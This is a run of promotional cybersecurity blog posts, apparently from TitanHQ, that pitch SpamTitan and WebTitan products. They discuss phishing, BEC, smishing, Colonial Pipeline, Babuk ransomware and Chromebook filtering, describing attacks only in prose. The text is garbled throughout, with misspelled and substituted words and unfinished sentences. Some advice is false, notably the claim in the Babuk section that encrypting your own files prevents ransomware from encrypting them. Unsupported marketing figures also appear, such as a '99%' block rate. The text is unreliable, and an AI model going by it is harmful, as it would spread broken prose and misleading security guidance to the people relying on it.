At present the main way that hacking groups are accessing business networks is via phishing campaigns.
The single best way of tacking phishing campaigns is using an email spam filter. This type of cybersecurity solution will audit all incoming email traffic to check for spam signature, phishing characteristics and any indication of malware.
An award-winning anti-spam software, SpamTitan boasts the best possible tools to safeguard your group from phishing and other email-leveraging campaigns. At present more than 1,500 organizations use SpamTitan globally.
While you may see a multitude of spam filtering solutions available which will claim to adequately safeguard your group from the smarted phishing tactics, one has become the chosen solution of managed service providers (MSP) – TitanHQ. Here we examine the reasons for this choice.
- Advanced email blocking: SpamTitan uses upload block and permits lists per policy, advanced reporting, recipient verification and outbound email reviewing. There is also a capability for whitelisting/blacklisting at all hierarchical levels of permissions within your network.
- Excellent malware protection: There are dual antivirus engines from two leading AV providers and sandboxing that leverages machine learning and behavioral analysis to tackle any file which appears to be dangerous.
- Protection against zero-day attacks: Machine learning predictive technology takes zero-day attacks foen and there is also AI-driven threat intelligence to tackle block zero-minute attacks head on.
- Office 365 environment security measures: There are a range of protection measures present that secure in depth against email threats. These can be simply added to Office 365 environments to greatly enhance security in the face of phishing and email-based malware campaigns.
- Easy integration: There is a straightforward configuration process for adding this to your existing Service Stack through TitanHQ API’s and MSPs benefit from streamlined management with RMM integrations.
- Data leak prevention: Strong data leak prevention rules that are easy to create and allow for tagging of data to spot and block internal data loss.
- Intuitive multi-tenant dashboard: MSP-client hierarchy means that you can keep clients segregated and decide if you need to manage client settings in bulk or on an individual basis. This is a set and forget solution, meaning a low level of IT service intervention is all that is required.
- White labelling: Can be supplied a #white label version to reinforce an MSP’s brand.
- Industry-leading customer support: TitanHQ customer service is the industry leader in the field with world class pre-sales and technical support and sales & technical guidance. MSPs are allocated a dedicated account manager, assigned sales engineer support, access to the Global Partner Program Hotline, and 24/7 priority technical support.
- Competitive pricing and monthly billing: SPs benefit can view the transparent pricing policy, competitive pricing, excellent margins, and monthly billing. The sales cycle is just 14 days.
If you would like to begin providing SpamTitan for your clients, contact the TitanHQ channel team at once and begin your free trial.
There has been a surge in the amount of profit-generating cyberattacks in the last year, particularly within the healthcare sector in the USA.
In tandem with this the amount of money demanded to release encrypted data, by hackers, has gone through the roof. Even in cases where this ransom is handed over the recovery process can be very tricky and in a lot of cases the data is never handed by the cybercriminals at all.
This is a situation that no group wants to find themselves in so it is important to be sure you have addressed all possible weaknesses in relation to your cybersecurity measures. Here we have listed the areas which, if unaddressed, are likely to allow hackers to disrupt your organization’s ability to operate.
Security Mistakes That Must Be Addressed
- Multi Factor Authentication: When log in details are stolen there is huge potential for hackers to access your databases. However, if you have multi-factor authentication configured then this risk is mitigated as there is a second stage of verification that must be completed in order for access to be granted.
- Email Security: Phishing presents a huge danger to all networks. Hackers send email trying to get staff to either reply or click on a link that will lead to the installation of malware or adware on your servers. Ideally cybercriminals are seeking the log in credentials of a high level executive who has permission to access all parts of the network. Configuring an advanced AI-based spam filter that uses sandboxing and greylisting will prevent this from happening 99% of the time.
- Security Awareness Training: As a lot of attacks, liek email attacks mentioned above, focus on interaction with employees, it is vital that you train these people to spot potential attacks. Regular refresher training courses are also important to keep everything fresh in the mind and educate in relation to new threats that have appeared since the last training session.
- Web Security: It is important to add security to police Internet activity on your networks. It would be very easy for an employee to unknowingly browse onto a site that is loaded with adware and malware. Using web filtering software will cut off access to malicious websites.
- Applying Patches & Software Updates: Hackers are swift to try and take advantage of software, firmware, and operating system flaws. Due to this it is vital that your organization applies patches and runs updates as soon as they become available. If this task is not not then it is bound to be just a matter of time before someone gains access to your network and servers.
- Password Management Software: Creating weak passwords leaks you vulnerable to brute force attacks Staff should be given the tools to set up and save strong secure passwords.
- Creating an Incident Response Plan & Back-ups: ‘Fail to prepare, prepare to fail’ as the saying goes. Companies that have not planned for what to do in the event that they are infiltrated by a cyberattack could have irreparable damage inflicted upon them. Regular backups must be created and tested. It is also wise to store one copy of the backup off site.
During April 2021, cybercriminals were able to log onto the databases of Colonial Pipeline and install ransomware that led to the shutdown of a fuel pipeline system that provides service to the entire eastern Eastern Seaboard of the USA.
This resulted in a lot of panic buying of fuel by Americans on the East Coast as fuel supplies were threatened. The knock-on effect of this was local fuel shortages and a surge in the price of gasoline to their highest level since 2015. There was a 4.6 million barrels drop in the level of stockpiles of gasoline on the East Coast.
The DarkSide ransomware-as-a-service operation was blamed for the attack and has now been taken down. Before it was shut down, Colonial Pipeline handed over a $4.4 million ransom to remove the encryption from their files. They took the decision to pay the ransom due to the danger facing the fuel supplies. Colonial Pipeline provided almost half (45%) of fuel to the East Coast. Though handing over the ransom was a difficult move to make, it had to be done due to the threat to fuel supplies. Another consideration was the length of time that it might take to retrieve the files without having the attacker-supplied decryption keys.
This attack should not have been allowed to gain access to such a critical infrastructure. The subsequent review into the cyberattack showed that all it took for the attack to be successful was the use of one compromised password to remotely access the database. The account that was compromised was not secured using multi-factor authentication.
According to Charles Carmakal, senior vice president at cybersecurity firm Mandiant which was involved in the investigation, the compromised password was for a virtual private network account. The account may have been dormant but it was still possible to use the login credentials to gain access to Colonial Pipeline’s network.
As of yet it remains unknown how the cybercriminals came to be in possession of this password. The password has since been located in a database of breached passwords that was made available via the dark web. There is a chance that an individual had created a password for the account and it was also in use on a separate account that was infiltrated. It is typical for passwords from data breaches to be used in brute force attacks as password reuse is commonplace. Phishing campaigns are used to obtain passwords also.
Mandiant searched for anything to suggest how the password was stolen by the cybercriminals. The cybersecurity experts found no evidence of hacker activity prior to April 29, 2021 nor any proof of phishing attempts. At this point in time it appears that how the password was obtained and the username determined may never come to be known.
Is it quite obvious that this hack could have been stopped using cybersecurity best practices including carrying out audits of accounts and closing down dormant accounts, creating setting unique and complex passwords for every account, configuring multi-factor authentication to prevent stolen compromised passwords from being used for access, and installing a robust anti-spam solution.
Created in 2008, GitHub has recorded massive growth amongst developers and companies for its hosting, sharing and software code capabilities. These are available in both open source and proprietary codemaking it very popular with more than 100 million code repositories currently on the platform.
Sadly, this also means that GitHub is a very attractive target for cybercriminals who have used the platform’s popularity as as a basis for several attack types, including ranoms, backdoor attacks and code injection campaigns. GitHub Actions is a feature of GitHub that allows a CI/CD workflow pipeline for software delivery into production. It is one of the main infrastructures in GitHub that automates software workflow. In a recent exploit, experts at Google Project Zero discovered a design vulnerability in GitHub Actions. This vulnerability could allow a hacker write access to a repository, meaning that they could reveal encrypted secrets. One of the experts, Felix Wilhelm, was able to show the vulnerability using Microsoft’s Visual Studio Code GitHub repository, where he could inject code which was then shared with the project’s new issue workflow.
The flaws in Actions allow ways for cybercriminals to exploit the GitHub database network. Recently code injection flaws and vulnerabilities in GitHub Actions allowed crypto-criminals to conduct bit mining malware. The attacks have been registering since late last year. The attack targets repositories using Actions, the automatic execution of software workflows feature to place malicious code into a software workflow. The process leveraged by the hackers is smooth slick: the malicious GitHub Actions code is first forked from original workflows, but then a Pull Request merges the code back, in tandem with the crypto miner code. The key to the attack uses GitHub’s infrastructure to share malware and mine cryptocurrency on GitHub’s servers. The flaw in Actions means that the attack does not need the repository owner to give permission for the Pull Request: The crypto-miner code, misnamed as npm.exe. is hosted on GitHub. The whole attack is expertly devised using a mechanism that has, so far, made a mockery of the critical infrastructure of GitHub.
The worry in relation to this recent crypto mining attack on GitHub repositories, is that the hacker, yet again, leveraging inherent infrastructure of a network. Any weakness in the corporate structure can be targeted. Bolstering the security of these infrastructure hatches is crucial to stopping cyber-attacks. Source code is a critical system and GitHub a critical infrastructure. Firms and vendors using GitHub should ensure they use best security practices. But even groups not using GitHub as a source code repository may well be receiving source code hosted via GitHub. To address this cybersecurity best practices must be implemented. People, processes, and technology are the some of the tje cyber best practices, but adding in awareness of possible infrastructure hacks is vital to keeping your business protected.
Some of the steps that you need to implement include:
- Stopping employees from visiting dangerous URLs or installing malicious software/files
- Preventing staff from accessing infected web portals
- Implementing GitHub security best steps when using the infrastructure to host source code
- Training staff to ensure they are conscious of security tricks and tactics
Preventing these attacks is possible with WebTitan Cloud DNS filter. It will tackle malware, phishing, viruses, ransomware & malicious sites.
A recent survey of IT security professionals, conducted by TitanHQ along with Osterman Research, has indicated that businesses most commonly witness security incidents involving business email compromise (BEC) attacks.
This type of attack is when a hacker pretends to be a genuine contact or company to fool someone into completing a fraudulent financial transfer, shreare protected information or attempt to encrypt servers in order to demand a ransom for this to be removed.
These attacks can pretend to be a known company or else leverage a contact’s email that has already been infiltrated in a hacking attack. The other route of attack normally is as simple as altering the display name to make the recipient believe the email has been sent by a real contact, often the CEO, CFO, or a supplier.
Lookalike or similar domains are also deployed in BEC attacks. This is where the cybercriminal copoes the spoofed company’s email template or layout so that it seems perfectly real to the recipient.
BEC emails are expertly composed, most of the time, and aim to take advantage of an individual within an organization or a person in a specific position, more often than not the finance section of the organization. However, attacks have also been known to aim for the HR department, marketing department, IT department, and management.
In a lot of cases the hackers use the fact that the emails are quite realistic to engage with an employee in a stream of emails before asking for a money transfer or data swap to be completed. Even though this style of hacking attack is not as common as phishing attacks, the money stolen using it is much greater year on year.
There are a number of important steps to take to defend against these attacks:
- Raise awareness of the threat by conducting staff training sessions that teach individuals how to spot a BEC attack.
- Created policies and processes that state all email requests in relation to bank account details, payment methods, or make changes to direct deposit information for payroll to be verified by calling the known contact directly via the telephone number that you have on file.
- Implement a solid email security system.
A solid email security system mitigates the chance of human error leaving you vulnerable to BEC attacks. it will prevent all efforts hackers make to steal email credentials. If there are machine learning techniques then you will be protected from zero-day attacks and DMARC and sender policy framework (SPF) will identify emails from individuals not permitted to send messages from a particular domain.
Ideally you should use an email security system like SpamTitan. This solution used all of the aforementioned methods of securing your organization from BEC attacks. When this is used along with the correct staff training and administrative measures, your group will be properly kitted out to address the threat posed by BEC attacks.
If you would like to learn more about how SpamTitan secures your company, call the TitanHQ team as soon as you can.
There has been a surge in phishing since the beginning of the COVID-19 pandemic in early 2020 and there is no sign, or likelihood, that this wille ase off due to the massive profits that cybercriminals are making from these attacks. Hackers continues to devise new and more believable strategies in order to counter individuals and group becoming aware of their attack methods and cybersecurity measures are enhanced to takcle them. Recently, a sharp focus from hackers on the leverage of PDF files for phishing purposes has been noticed.
The use of files like this permits the use of rich-text information such as URLS, pictures, GIFs, and internal scripts linked to the file. In the most recent string of attacks, phishing campaigns incorporate PDF attachments that conduct a range of tactics to bring users to a malicious site as they try to harvest data. Here are five styles of PDF phishing attacks to look be aware of at present:
- File Sharing and Phishing: The majority of web users either a Google Drive account or a Microsoft OneDrive account. Access one of these will give hackers enough info and private data to. Cybercriminals implement the use of PDF files to make viewers hand over the private log on details which will allow them to infiltrated targeted victim accounts. The picture shows a prompt that will grant access a file that the user instinctively knows should click on within their cloud drive. However a phishing page appears when the user clicks the URL. This phishing page identical to OneDrive or Google Drive’s landing page, so users who do not see the actual domain name in their browser window will just hand over their username and password details. Once they do this the hacker will receive it and be able to access the cloud drive account.
- Fake CAPTCHA Redirects: A CAPTCHA is a recognized symbol for Internet users and therefore is a straightforward way to fool users into visiting a URL. This attack features the hacker placing an image of the common Google CAPTCHA interface within the sent email. Users recognize the image and choose “Continue” and expect to see the website that they are attempting to access. When the link is visited, the user is taken to a cybercriminal-controlled site where users must hand over their private information.
- Ecommerce Site Scams: The most recent PDF phishing attacks feature popular common ecommerce logos to trick users into thinking that clicks are genuine. Ecommerce portals often require private information and credit card data, so attackers can harvest products using the targeted victim’s data information. In some cases the PDF file might include the official Amazon logo and request users to visit the link to buy products. Rather that visiting Amazon in the user’s browser, a cybercriminal-controlled website pretending to be the legitimate portal asks users to authenticate. When users hand over details credentials, the cybercriminal gains their login information to access their ecommerce account.
- Play Buttons on Static Images: If there is a play button present on a picture it will, typically, be clicked on in order to play a video. A recent scam, targeting cryptocurrency traders and investors, gets PDF readers to open the file in the hop ethat they will click the link on the fake video image. Rather than playing a video, users are taken to a phishing website that asks them to hand over their credit card information for a dating portal.
- Using Popular Logos for Malicious Redirects: It is not difficult to prompt users to click links using recognizable logos. When hackers use a logo from a well-known brand, they can fool users into visiting the logo. With this attack, an image of a well-known brand is placed within the PDF file with the offer of a discount. It appears to be the same as a common brand sale, so it fools users into clicking on the image. After the user does so, a browser opens and targets a redirect site. The redirect site then shares an attacker-controlled phishing page to the user. Just like with the CAPTCHA scam, users who do not realizethat the redirect is not what it seems may hand over private data or login credentials to access the platform.
Using email filters to stop these attacks will mean that malicious attachments are recognized and prevented from reaching the intended recipient’s inbox. A SpamTitan email filter will prevent blocks spam, viruses, malware, phishing attempts and other email threats that are targeting companies, MSP’s and educational bodies worldwide.
As workers begin to return offices following the COVID-19 vaccine roll out hackers are launching new campaigns to take advantage of this turn of events.
This follows previous attacks that sought to take advantage of the interest in the COVID-19 virus at the height of the pandemic. Workers going back to their usual place of work has created opportunity for scammers, who have launched a new phishing campaign targeting workers returning to offices.
The new attacks claim to be sent from the organizations Chief Information Officer to advise the staff in relation to new protocols and processes that have been devised to assist the returning workers avoid any possibility of infection. They appear to have been only broadcast internally in the organization, and even include the logo of the group and what looks like a signature of the CIO. There is a URL included that advises recipients to visit (a Microsoft SharePoint page) to view/download two documents in relation to this – a COVID-19 information sheet and an implementation letter that lists steps that the company has implemented as a result of the guidance from the Centers for Disease Control and Prevention (CDC), World Health Organization (WHO), and local health bodies.
While the majority of phishing attacks attempt to bring recipients of emails to a phishing form to collate Office 365 credentials, this campaign goes one step further in that phish is only initiated once the link is clicked on. When this is done, a fake Microsoft login prompt pops up and details must then be shared in order to access the files. Once the details are handed over, a message appears informing the staff member that their account or password is incorrect, and they must enter it again before they are finally brought to a genuine Microsoft page and are given access to the documents on OneDrive. This means that there is no clear indication that credentials have been phished.
This COVID-19 phishing campaign, like many others launched during the pandemic, feature. In this case, the emails have been excellently compose and have been written for individually-targeted groups, making them appear authentic and likely to trick lots of people. It remains unknown what the cybercriminals are aiming to do with the stolen data once it has been collected. They could be used to harvest lots of protected data held within Office 365 email accounts, would allow the cybercriminals to establish a footing in the corporate network for a more extensive compromise, or they could be sold for a profit to different cybercriminal collectives.
The best tactic for dealing with this level of threat is to using an advanced spam filtering solution like SpamTitan. With SpamTitan implemented, phishing attacks like this will be spotted and dealt with at the gateway so that employee are not being relied on to prevent the databases being infiltrated.
Contact the TitanHQ team now in order to enhance your security posture and tackle the dangers of cybercriminal attacks for your organization.
A flaw in the mobile Safari browser has been targeted by cybercriminals and used to extort money from people who have previously used their mobile device to access pornography or other illegal content. The Safari scareware stops the user from logging on to the Internet on their device by loading a series of pop-up messages.
A popup is shown that states Safari cannot open the requested page. Clicking on OK to shut the message triggers another popup warning. Safari is then locked in an endless loop of popup ads that cannot be removed.
A message is shown in the background stating the device has been locked because the user has been identified as having viewed illegal web content. Some users have reported messages including Interpol banners, which are intended to make the user believe the lock has been put on their phone by law enforcement. The only way of regaining access to the device, according to the popups, is to pay a fine.
One of the domains used by the hackers is police-pay.com; however, few users would likely be tricked into thinking the browser lock was put in place by a police department as the fine had to be paid in the form of an iTunes gift card.
Other messages tell the user that police action will be taken if the payment is not made. The hackers claim they will send the user’s browsing history and installed files to the Metropolitan Police if the ransom is not paid.
The Safari scareware campaign was discovered by Lookout, which passed details of the exploit onto Apple which addressed the flaw to block the attacks in iOS version 10.3. Scareware attacks such as these are common.
Scareware is not the same as ransomware, although both are used to extort money. In the case of ransomware, access to a device is obtained by the hacker and malicious file-encrypting malware is installed. That malware then locks users’ files with powerful encryption. If a backup of the encrypted files is not maintained, the user faces loss of data if they do not pay the hackers for the key to decrypt their locked files.
Scareware may incorporate malware, although more commonly – as was the case with this Safari scareware campaign – it involves inserting malicious code on websites. The code is run when a user with a vulnerable browser visits an infected webpage. The thinking behind scareware is to scare the end user into paying the ransom demand to unlock their computer. In contrast to ransomware, which cannot be unlocked without the necessary decryption key, it is usually possible to unlock scareware-locked browsers with a little computer knowledge. In this instance, control of the phone could be regained by clearing the Safari cache of all cookies and data.
Digimine malware was first spotted in a campaign targeting users in South Korea; however, the attacks have now gone global. Digimine is a cryptocurrency mining malware that is installed and used to hijack the CPU and GPU on an infected device and use it to mine the cryptocurrency Monero.
The increase in popularity of cryptocurrency, and its meteoric rise in value, means mining cryptocurrency can be highly profitable. Mining cryptocurrency is the verification of cryptocurrency transactions for digital exchanges, which involves using computers to complete complex numerical problems. For verifying transactions, cryptocurrency miners are rewarded with coins, but cryptocurrency mining requires a lot of processing power. To make it profitable, it must be carried out on an industrial scale and hackers have realized the best way to do this is to use other people’s computers and servers. The processing power of hundreds of thousands of devices would result in the operation becoming highly profitable for cybercriminals, a fact that has certainly not been missed by the creators of Digimine malware.
Infection with Digimine malware will see the victim’s device slowed, as its processing power is being used mining Monero. However, that is not the only problem. The campaign spreading this malware variant works via Facebook Messenger, and infection can see the victim’s contacts targeted, and could possibly lead to the victim’s Facebook account being hijacked.
The Digimine malware campaign is being conducted through the Desktop version of Facebook Messenger, via Google Chrome instead of the mobile app. Once a victim is infected, if their Facebook account is set to login automatically, the malware will send links to all individuals in the victim’s contact list. Visiting those links will result in the installation of the malware, the generation of more messages to contacts and more infections, building up an army of hijacked devices for mining Monero.
Infections were first seen in South Korea; however, they have now spread throughout east and south-east Asia, and beyond to Vietnam, Thailand, Philippines, Azerbaijan, Ukraine, and Venezuela, according to Trend Micro.
A similar campaign has also been seen by FortiGuard Labs. That campaign is being carried out by the actors behind the ransomware VenusLocker, who have similarly changed to Monero mining malware. That campaign also began in South Korea and is spreading quickly. Instead of using Facebook Messenger, the VenusLocker gang is using phishing emails.
Phishing emails for this campaign include infected email attachments that install the miner. One of the emails claims the victim’s details have been accidentally revealed exposed in a data breach, with the attachment containing details of the attack and instructions to follow to mitigate risk.
Cybercriminals will always focus a lot of their efforts on stealing healthcare records due to the high return they can make from getting hold of information on addresses, social security financial data. A hackers can make these available for a high price on darknet markets or use them to commit identity theft.
So far in 2021, millions of records holding the valuable private information have been illegally obtained by cybercriminals using phishing tactics. Once a breach is discovered by the healthcare organization it has a legal responsibility to contact impacted patients to make them aware of it, as per the Health Insurance Portability and Accountability Act of 1996 (HIPAA). The Department of Health and Human Services (HHS) published a web portal which allows the reporting of HIPAA breach incidents can be reported. This portal can also be accessed by the public where they can see the details of confirmed HIPAA breaches.
Phishing campaigns can be targeted at individuals with high-privilege attacks, or they could be randomized where millions of users receive the same email. Untargeted attacks focus on quantity over quality. The attacker hopes that just a small percentage of people will fall for the phishing message. With just a small percentage of victims, an attacker can still generate thousands in revenue from a single campaign.
Spear-phishing campaigns are much more targeted and effective. Fewer email messages are sent to targeted users, but the campaign can be much more potent. With a high-privileged account or successful ransomware installation, an attacker could make millions from their efforts. Ransomware targeting businesses asks for thousands in return for private keys to decrypt data, or an attacker could use stolen credentials to exfiltrate data from corporate servers.
Both types of phishing campaigns are damaging to corporate reputation and patient data privacy, which is why healthcare providers and other organizations should take several steps to protect users from being phishing targets. Users don’t have the training necessary to identify phishing campaigns, but even IT administrators fall victim to these attacks. The best way to protect users is to stop malicious messages from reaching targeted recipient inboxes. This can be done using email filters.
The best way to prevent phishing attacks on your email servers is to configure a robust and constantly update cybersecurity solution. Email filters using artificial intelligence (AI) are the best way to discover dangerous emails. They can be quarantined prior to landing in the intended recipient’s inbox. The quarantined emails can still be monitored by system administrators for review and, should they find that a message has been incorrectly quarantined, they can forward the emails to the intended recipients.
Additionally, attachments and files are often leveraged to fool email recipients into downloading ransomware on the network. This tactic is typically used to deploy ransomware, another dangerous attack style that targets data privacy and integrity. Threat actors often use it to target on healthcare providers knowing that it can bring business workflows and productivity to a stand still. Cybersecurity systems can track and review attachments to see if they hold macros used to install ransomware and place it on corporate systems.
Your organization should be aiming to put in place a multi-layer cybersecurity to safeguard its databases. If you do not have
Without a layered cybersecurity approach, healthcare providers could become part of the next large data breach. Implementing a strong email filter and the correct type of web content filters will allow your organization to mitigate the dangers posed by human mistakes. Email filters will spot malicious emails, quarantine them, and allow administrators to double check messages.
The widespread use of Chromebooks in educational institutions worldwides has seen the device implement by up to 40 million users in this sector.
While these devices solve an issue in relation to the close equity, technology and homework gaps that many school districts need to address there is also the issue of cybersecurity that needs to be addressed A Chromebook in the end is only a tool that should be used in the proper manner. The main reason these device are supplied in an educational setting is to provide access to something online, usually an educational application or a game app.
Enforcing borders is crucial for young users as they prevent students from remaining connected to game sites and searching for malicious content. Along with this there is the issue of CIPA compliance for K12 institutions that depend on e-rate funding. CIPA forces school districts to implement an internet safety policy that blocks and filters images and content that is classified as harmful to minors. Secure borders are a requirement for school districts that implement Chromebooks on any scale.
Chromebooks required the same security as other computing devices. as they are susceptible to malicious code. Even thought they will not run traditional .exe files can’t run on a Chromebook, Android malware and other dangers are an active threat. The main attacked vector is the internet for malware and other malicious campaigns. Next generation DNS blocking is important for any multi-level cybersecurity strategy and should be used in all educational filtering solutions.
WebTitan on-the go for Chromebooks offers a level of excellence similar used by Windows admins to delivering user and device-level web filtering for their system’s Windows 10 devices. This is also available at a bespoke level for Chromebook. The WebTitan Cloud management interface is very easy to use and has a web-based intuitive design.
WebTitan is designed for the “Anywhere Workforce” as well as “Anywhere Learning.” Whether your students are using their devices on campus within a traditional classroom or at a remote place, they and their devices are secured by the same granular internet filtering policies. The cloud based solution gives internal IT the ability to fully manage your web filtering system from anywhere globally.
This allows admins the same tools and interface regardless of there they are based. For onboarding, rather than relying on-premise or user client software, WebTitan simply redirects the DNS traffic of all of your devices in the cloud. Because there is no inline device, you don’t have to worry about intranet traffic being blocked or non HTTP/HTTPS traffic.
When it comes down to it, there is probably no institution more difficult to configured web filters for than K12. WebTitan on-the-go for Chromebooks was created to work on the most complex of environments using a simple 3-step process.
- Set up your desired groups
- Configure granular filtering policies to prevent various categories
- Assign those policies to your groups
You can also override your policies with manually created exceptions.
The reporting feature of WebTitan allows for querying relevant information in relation to a student’s internet history and summarize it into a simple to read report. Administrators and IT personnel can also identify broad based behavior patterns surrounding student internet usage at the system and group level.
Another reassuring feature is WebTitan’s malicious detection service which is always searching for malicious threats in real time with the assistance of AI-powered protection that can combat emerging phishing URLs and even zero-minute attacks.
The first quarter of 2021 has seen the surge in ransomware attacks on companies continue, with most of the victims targeted when they had insufficient security measures in place to fight the attacks,leaving both their databases and valuable data vulnerable,
In most cases the use of a range of recommended measures would have prevented an attack from being successful. Here we have listed the standard measures that will bolster your cybersecurity suite.
Measure that can Fight Ransomware Attacks on your Business
There are several ransomware mitigations that can be implemented to reduce the risk of ransomware attacks and limit the severity of an attack should a network be compromised.
- Limit access to network resources: Use the principle of least privilege and implement a strict restriction administrative access and the ability to download and run software.
- Configure a strong spam filter: The use of a strong spam filter will prevent phishing attacks and malware delivered via email from infiltrating your databases.
- Use a web filter to review network traffic: Configuring a web filter will allows you systems to spot access attempts to malicious websites and recognise malicious IP addresses.
- Set up multi-factor authentication: Stolen log in details, taken during phishing attacks, allow ransomware actors to invade networks. Multi-factor authentication will stop this and act as an additional safeguard if one log-in credential is stolen.
- Limit or obstruct Remote Desktop Protocol (RDP): Consider if RDP is necessary and disable it wherever possible. Double check originating sources are restricted and implement multi-factor authentication as mentioned previously.
- Provide end-user security awareness training: This is make sure employees are aware of how to spot phishing emails and be conscious of cybersecurity best practices and participating in dangerous online activity.
- Invest in the best available AV software: Using an advanced anti-virus solution that conducts regular scans of all IT assets for malware, will keep your network safe.
- Apply patches promptly and update software regularly: This is crucial in order to fight the exploitation of vulnerabilities. The majority of vulnerabilities exploited in attacks are months old, yet patches were not applied.
- Turn off macro scripts in Office files: Turn off Office macros on all devices unless there is a business need for allowing them. Open Office files sharing using email using Office Viewer software rather than the full Office application.
- Do not allow inbound connections from Cobalt Strike servers: Do this and restrict the use of other post-exploitation tools where possible.
- Add application allowlisting: Only allow applications and systems to run programs as permitted by your security policy. Prevent the execution of programs from popular ransomware locations such as temporary folders and the LocalAppData folder.
- Put in place network segmentation: This is limit the harm that can be caused on different parts of your databases should an attack infiltrate your network.
- Prevent inbound connections from anonymization services: Turn off access from Tor and other anonymization services to IP addresses and ports where external connections are not standard or required.
- Create a robust backup policy: See to it that backups of critical data completed on a regular basis and tested to ensure file recovery can take place. Keep a copy of the backup in a secure offline place.
Arrests have been made in the United Kingdom after a group of hacker was discovered to be sending large amounts of text messages to try and trick recipient into sharing their login details.
The Birmingham-based cybercriminals published their own website and using online advertising to reach more potential victims. When these activities were discovered police issued a warrant for the arrest of those responsible.
The group, referred to as ‘SMS Bandits’ advertised across several mediums and sent text messages which included a link to a malicious website that request visitors to share their login credentials and other sensitive data. SMS Bandits pledged to attack a large amount of phone numbers with smishing messages for just $40 to $125 per week using the service they called ‘OTP Agency’.
The service they advertised was offering to conduct smishing attacks, the SMS bandits offered “bulletproof hosting,” meaning the attack site could not be taken down by standard legal efforts. In most cases, these attacks fail when the site is reported and hosting is disable by the host. The smishing attacks could be bespoke, allowing the specific targeting of small businesses, large businesses, and individuals.
It is important for organization to be conscious of the threat posed by smishing and take steps to training staff in relation to this. Hacker aim to use smishing to begin an attack and steal intellectual property or private corporate information that could be damaging to an organization reputation.
Email filters are a excellent at preventing messages from spoofed senders and malicious message content, but text messages do no tnormally have a feature like this. This best tactic to prevent smishing is to educate staff members in relation to spotting them. The content is typically similar to a phishing attack with offers of discounts or money in exchange for clicking a link and entering private data. If this data happens to be corporate data, then it would be disclosed to the cybercriminals.
One of the main characteristics of a smishing attack is the use of short links – denying readers full visibility of the site behind the URL. Short links should be the first warning sign in relation to smishing, the second being the promise of money or discounts. Seeing both of these together is a sure sign that message is malicious and should be deleted.
Companies need to train staff members so they can spot these signs and characteristics of smishing attacks. The importance of never handing over credentials to any third party, or filling out a form that included them on a linked website, needs to be emphasised.
Using a solution like that offered by multi-award winning TitanHQ would add a security suite renowned for advanced email security, DNS filtering and safe email archiving. Make the first move and get in touch with the team at TitanHQ today.
TitanHQ has released WebTitan Cloud 4.16 which adds new functionality to the DNS-based web filtering solution to make management even easier. The latest release also includes a new school web filtering solution.
WebTitan Cloud 4.16 includes DNS Proxy 2.06, which allows filtering of users in Azure Active Directory, as well as on-premise AD and directory integration for Active Directory to make the management of filtering controls for users, groups of users, and organization-wide controls even easier. The latest version includes several fixes and enhanced security to better protect users from web-based threats.
TitanHQ is pleased to announce the release of WebTitan OTG (on-the-go) for Chromebooks with the latest version of WebTitan Cloud. This new service has been specifically developed for the education sector to ensure students can access the Internet safely and securely.
The use of Chromebooks has been growing, with the devices popular in schools as they are a cost-effective way of giving students Internet access. While the Internet offers many learning opportunities, it is important to protect students from threats and web content that could cause them harm.
Schools should implement controls to restrict access to inappropriate content as well as block threats such as phishing, malware, and ransomware. WebTitan OTG for Chromebooks makes that a very quick and simple process.
WebTitan OTG (on-the-go) for Chromebooks allows IT professionals in the education sector to apply web filtering controls for individuals, school years, all students, and separate controls for staff members. From start to finish, set up takes just a few minutes.
Administrators have precision control over the content that can be accessed, allowing them to easily comply with state and federal laws, including the Children’s Internet Protection Act (CIPA).
WebTitan OTG for Chromebooks is a DNS-based web filter that filters the Internet before any content is downloaded. As such, there is no latency, regardless of where the Internet is accessed – in the classroom, at home, or elsewhere.
No hardware is required, there are no proxies or VPNs, and administrators have full visibility into Internet access, including locations, web pages visited, and attempts made to visit restricted content.
Key Features of WebTitan OTG for Chromebooks
- Cost effective web filtering for schools.
- Easy to install and manage remotely.
- Full reporting across Chromebook users and locations.
- User level policies.
- No additional on-premises hardware required.
- No slow & expensive VPNs or Proxies required.
- Chromebooks can be locked down to avoid circumvention.
- Fast, customizable & accurate DNS filtering.
Using WebTitan OTG for Chromebooks provides an effective way to apply filtering policies to your Chromebooks from the cloud.
“This new release comes after an expansive first quarter. The launch of WebTitan Cloud 4.16 brings phenomenal new security features to our customers,” Said TitanHQ CEO, Ronan Kavanagh. “After experiencing significant growth in 2020, TitanHQ expects these product enhancements and new features to make 2021 another record-breaking year.”
2021 has, so far, seen a massive rise in the introduction of new strains of ransomware being used to infiltrate the networks of enterprise organizations.
This represents a shift in the tactics of cybercriminals who spent most of 2020 trying to take advantage of workers who were forced into unsecured home-working environments by the COVID-19 pandemic. In the opening months of 2021 there is a clear surge in the amount of attacks that are concentrating on the employees who are slowly returning to large office settings.
One such strain of ransomware is called Babuk. This involves a request being sent to individuals, whose data has been encrypted, that seeks a $60k-$85k ransom to be transferred in order for the private keys to remove encryption to be handed over. Babuk, which is similar to regular ransomware campaign, includes a number of characteristics that have been designed specifically with companies in mind as a target.
Babuk disables many of the backup features available in Windows. The first feature to be made redundant is the Volume Shadow Copy Service (VSS) used to take backups of files in use. With this feature disabled, users cannot retrieve their current active files. It also disables file locking mechanism used on open and active files. For businesses using backup features in Microsoft Office, Babuk also turns off these features.
Babub then moves on to encrypting the database. This is completed by double-encrypting files that are smaller that 41MB, files larger than this are split prior to encryption. The encryption cipher being used is ChaCha8 which is generated from a SHA-256 hash – a cryptographically secure hashing algorithm. Unlike normal ransomware, Babuk only uses one private key as it is focused on infiltrating enterprise users.
There are a couple of ways that you can prepare for Babuk trying to attack and encrypt your databases. You will mitigate some of the danger by placing your own encryption on particularly important files. This will prevent Babuk from doing the same. Additionally, using a cloud backup will mean that there backups available for you to restore your information without handing over a ransom.
Monitoring software will weed out suspicious traffic on the network and, in doing so, prevent malware from encrypting files or exfiltrating data. System administrators will then be made aware of this and review the activity in question to gauge the threat level. Another strong security measure is using email filters with artificial intelligence (AI) that will allow you to spot potentially dangerous messages and attachments. They can then be quarantined and reviewed by an administrator. This method cuts out the possibility of human error leading to a malicious file being downloaded and initiating an encryption process.
Training and user education will also assist in preventing human error. This will involve providing staff with the knowledge required to spot threat. They will also be able to warn administrators about potential attacks and avoid running attachments on their local devices.
SpamTitan Email Security is a strong cybersecurity solution that will assist greatly in bring the risk of network infiltration down to an acceptable and manageable level. Call SpamTitan now to enquire about a free trial to witness the strength and value of the solution for yourself.
